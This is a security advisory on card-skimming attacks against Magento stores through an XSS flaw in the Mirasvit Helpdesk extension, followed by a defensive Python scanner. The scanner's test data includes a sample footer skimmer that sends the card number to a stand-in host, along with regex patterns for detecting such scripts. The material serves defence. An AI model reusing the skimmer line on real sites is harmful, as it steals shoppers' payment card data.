Magento Sites Targeted via Vulnerable Mirasvit Helpdesk Extension

According to security researcher Willem de Groot, threat actors are actively targeting Magento ecommerce sites running “Mirasvit Helpdesk,” an extension that lets visitors chat live with the store’s helpdesk agents. In September 2017, security firm WebShield published details of two vulnerabilities in the extension, warning that every version released up to that point was affected. The first, CVE-2017-14320, allows an attacker to upload files to the underlying Magento server; the second, CVE-2017-14321, is a cross-site scripting (XSS) vulnerability that allows an attacker to inject arbitrary web script or HTML. Mirasvit patched both vulnerabilities in September with the version 1.5.3 release.

Threat actors are nonetheless exploiting the XSS flaw to breach unpatched Magento sites, inserting malicious code into the store’s footer section so that it executes on every page of the store and exfiltrates payment card data entered during the checkout process.

The NJCCIC highly recommends that administrators of Magento-powered sites running the Mirasvit Helpdesk extension review Willem de Groot’s report and Magento’s associated security advisory, and update the affected extension to version 1.5.3 or later. Additionally, monitor sites for modified header/footer template insertions, and consider adding a Content Security Policy (CSP) header to prevent the unauthorized execution of JavaScript. Note that a CSP only blocks an injected inline script if its script-src (or default-src) directive omits 'unsafe-inline'; a policy that strict also blocks the store’s own inline scripts unless they are allowlisted by nonce or hash, so test it against the checkout flow before deploying it. A free malware scanner for administrators of websites using the Magento ecommerce platform is available on GitHub. The NJCCIC makes no claim as to the effectiveness of this tool and users are advised to exercise caution when downloading and installing any software from the internet.
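The two defensive checks recommended above, monitoring header/footer insertions for tampering and verifying that a CSP actually blocks inline script, can be scripted. The example below is added here and is not code from the advisory, from Willem de Groot, or from the GitHub scanner it mentions. It assumes the standard Magento 1 core_config_data paths for the "Miscellaneous Scripts" and "Miscellaneous HTML" settings (design/head/includes, design/footer/absolute_footer, design/footer/copyright), which is where footer-injected skimmers are stored; the sample rows are constructed, including a hypothetical skimmer pointed at the fictional host img.example-cdn.test.

```python
import hashlib
import re

# Magento 1 config rows whose values are rendered as raw HTML on every page.
# Assumption: these are the standard core_config_data paths for the
# HTML Head "Miscellaneous Scripts" and Footer "Miscellaneous HTML" settings.
WATCHED_PATHS = (
    "design/head/includes",
    "design/footer/absolute_footer",
    "design/footer/copyright",
)

SCRIPT_TAG = re.compile(r"<script\b([^>]*)>", re.IGNORECASE)
HAS_SRC = re.compile(r"\bsrc\s*=", re.IGNORECASE)
# Any src="..." assignment (tag attribute or JS property) pointing at a host.
EXTERNAL_SRC = re.compile(r"""src\s*=\s*["']?\s*(?:https?:)?//([^/"'\s>]+)""", re.IGNORECASE)
ENCODING_PRIMITIVES = re.compile(r"\b(?:eval|unescape|atob|btoa|fromCharCode|document\.write)\s*\(", re.IGNORECASE)
CHECKOUT_FIELDS = re.compile(r"\b(?:onepage|checkout|cc_number|cc_cid|card)\b", re.IGNORECASE)


def scan_config_rows(rows, allowed_hosts=()):
    """Flag watched config values that look like an injected skimmer.

    rows: iterable of (path, value) as read from core_config_data.
    allowed_hosts: third-party script hosts the store legitimately uses.
    Returns a list of {"path": ..., "reasons": [...]} findings.
    """
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for path, value in rows:
        if path not in WATCHED_PATHS or not value:
            continue
        reasons = []
        for match in SCRIPT_TAG.finditer(value):
            if not HAS_SRC.search(match.group(1)):
                reasons.append("inline script")
                break
        for host in EXTERNAL_SRC.findall(value):
            if host.lower() not in allowed:
                reasons.append(f"loads from external host {host}")
        if ENCODING_PRIMITIVES.search(value):
            reasons.append("encoding/obfuscation primitive")
        if CHECKOUT_FIELDS.search(value):
            reasons.append("references checkout/card fields")
        if reasons:
            findings.append({"path": path, "reasons": reasons})
    return findings


def fingerprint(rows):
    """SHA-256 of each watched value; store this as the known-good baseline."""
    return {p: hashlib.sha256(v.encode()).hexdigest() for p, v in rows if p in WATCHED_PATHS}


def changed_paths(baseline, current_rows):
    """Watched paths whose value differs from (or is absent in) the baseline."""
    return sorted(p for p, h in fingerprint(current_rows).items() if baseline.get(p) != h)


def csp_allows_inline_script(header):
    """True if this Content-Security-Policy would still let an injected
    inline <script> run: no script-src/default-src at all, or one that
    carries 'unsafe-inline' without a nonce/hash (which makes browsers
    ignore 'unsafe-inline')."""
    directives = {}
    for part in header.split(";"):
        tokens = part.strip().split()
        if tokens:
            directives[tokens[0].lower()] = [t.lower() for t in tokens[1:]]
    sources = directives.get("script-src", directives.get("default-src"))
    if sources is None:
        return True
    has_nonce_or_hash = any(t.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-")) for t in sources)
    return "'unsafe-inline'" in sources and not has_nonce_or_hash


# Constructed sample rows: a clean copyright line, a legitimate analytics
# include, and a hypothetical footer skimmer posting the card number to a
# fictional host (this is illustrative data, not a captured sample).
CLEAN_ROWS = [
    ("design/footer/copyright", "&copy; 2017 Example Store. All Rights Reserved."),
    ("design/head/includes", '<script src="https://www.google-analytics.com/analytics.js"></script>'),
    ("design/footer/absolute_footer", ""),
]
TAMPERED_ROWS = CLEAN_ROWS[:2] + [
    ("design/footer/absolute_footer",
     '<script>document.addEventListener("submit",function(e){var d=document.getElementById("cc_number");'
     'new Image().src="https://img.example-cdn.test/p.gif?c="+btoa(d.value)});</script>'),
]

if __name__ == "__main__":
    baseline = fingerprint(CLEAN_ROWS)
    print("changed:", changed_paths(baseline, TAMPERED_ROWS))
    for f in scan_config_rows(TAMPERED_ROWS, allowed_hosts={"www.google-analytics.com"}):
        print(f["path"], "->", "; ".join(f["reasons"]))
    print("CSP allows inline:", csp_allows_inline_script("script-src 'self' 'unsafe-inline'"))
```

In practice the rows come from `SELECT path, value FROM core_config_data WHERE path LIKE 'design/%'`, run on a schedule; the hash comparison catches any change to the watched values, and the pattern scan explains why a change is suspicious. The CSP check is the caveat to the advisory's recommendation: a header containing 'unsafe-inline' (and no nonce or hash) provides no protection against a footer-injected script.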